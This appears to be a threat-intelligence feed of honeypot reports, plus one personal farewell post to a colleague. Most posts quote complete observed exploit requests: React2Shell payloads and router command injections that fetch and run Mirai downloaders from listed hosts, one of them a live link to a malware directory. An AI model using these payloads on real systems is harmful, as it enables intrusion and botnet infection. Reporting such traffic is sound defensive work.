92.118.39[.]30 is trying to exploit #react2shell with the POST:
0={"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var+res=process.mainModule.require('child_process').execSync('(nc+45.135.194[.]27+3443+||+telnet+45.135.194[.]27+3443+||+busybox+nc+45.135.194[.]27+3443)+|+sh').toString().trim();;throw+Object.assign(new+Error('NEXT_REDIRECT'),{digest:+`NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}&1="$@0"&2=[]"

Netcat is used to trigger a #mirai downloader. Is interesting that the script atempts to kill a process using /var/Sofia (??)

#bot #malware #dfir

172.245.21[.]30 is trying to exploit CVE-2014-2321, ZTE F460 and F660 cable modems RCE with the command:
POST /web_shell_cmd.gch post_input IF_ACTION=apply&IF_ERRORSTR=SUCC&IF_ERRORPARAM=SUCC&IF_ERRORTYPE=-1&Cmd=wget+hXXp://107.172.79[.]248+ins/mips+-O+/var/tmp/init.norm&CmdAck="

Target 107.172.79[.]248 is currently rejecting connection

#malware #bot #dfir

43.228.157[.]64 is trying to exploit CVE-2025-55182 (React2Shell) to spread Mirai Botnet Malware with the command:
POST /api/action 443 posted 0={"_response":{"_formData":{"get":"$1:constructor:constructor"},"_prefix":"var+res+=+process.mainModule.require('child_process').execSync('wget+-qO+-+hXXp://83.142.209[.]47/x+|+bash;+curl+-sLk+hXXp://83.142.209[.]47/x+|+bash',{timeout:5000}).toString().trim();+throw+Object.assign(new+Error('NEXT_REDIRECT'),+{digest:`${res}`});"},"reason":-1,"status":"resolved_model","then":"$1:__proto__:then","value":"{\"then\":+\"$B0\"}"}&1="$@0""

hXXp://83.142.209[.]47/x is a bash script that downloads and executes Mirai variants for different architectures.

#malware #bot #dfir #mirai #react2shell

We knew each other for some time, as we had common friends, but it wasn't until BlackHat Europe 2010 when we became friends.
The Eyjafjallajökull volcano eruption left us stranded in Barcelona for a week and, as the "formerly local" person, I was the go to person to fill the day waiting for the planes to come back. I remember looking for cars to drive back to Berlin and you nearly bought one. The only stopper was the lack of insurance. You could do lots of crazy stuff, but as german, you don't fuck a around with cars. German brands only, Insurance is a must!
I introduced you to my local friends which they still remember you when we get together, and we watched Barça with DT in a crappy bar.
Eyjafjallajökull became a running joke and you even came to a CCCamp with a t-shirt with Eyjafjallajökull printed in it. I guess I never said it, but it meant a lot to me.
This summer I visited Eyjafjallajökull and I sent you a picture of it, which trigger some funny conversations and a reconnection. Now, I wish I had been more active.
Hack the planet my friend. #FX

https://blog.recurity-labs.com/2026-03-02/Farewell_Felix

193.142.146[.]230 is trying to exploit CVE-2023-26801 to spread Mirai Botnet Malware with the command:
POST /goform/set_LimitClient_cfg time1=00:00-00:00&time2=00:00-00:00&mac=;wget hXXp://45.194.92[.]39/o; curl -O hXXp://45.194.92[.]39/o; chmod 777 o; sh o; rm -rf o; rm -rf o.*"

hXXp://45.194.92[.]39/o is a bash script that downloads and executes Mirai variants for different architectures.

#malware #bot #dfir #mirai #LB-LINK

176.65.139[.]36 is trying to exploit CVE-2025-55182 (React2Shell): Remote code execution in React Server Components and Next.js with the POST:

0="$1"&1={"status":"resolved_model","reason":0,"_response":"$5","value":"{\"then\":\"$4:map\",\"0\":{\"then\":\"$B3\"},\"length\":1}","then":"$2:then"}&2="$@3"&3=""&4=[]&5={"_bundlerConfig":{},"_chunks":"$2:_response:_chunks","_formData":{"get":"$4:constructor:constructor"},"_prefix":"(function(){\n try {\n var res = process.mainModule.require(\"child_process\").execSync(\"cd /tmp; rm -rf *; pkill xd.x86; wget hXXp://94.156.152[.]67/xd.x86; curl -O hXXp://94.156.152[.]67/xd.x86; chmod 777 xd.x86; ./xd.x86 nextjs\").toString();\n console.log(\"\\n[ ] RCE RESULT:\\n\" res);\n throw new Error(\"[ ] RCE SUCCESS: \" res);\n

#malware #bot #React2Shell #mirai

pool-99-232-24-98.cpe.net.cable.rogers.com / 99.232.24.98 is trying to exploit CVE-2024-3721 with POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /tmp; busybox rm tbk.sh; wget hXXp://130.12.180[.]120:8080/file/tbk.sh; busybox sh tbk.sh 80 empty "

#malware #bot

Server with Mirai samples

http://94.156.152.67/

#opendir #malware #mirai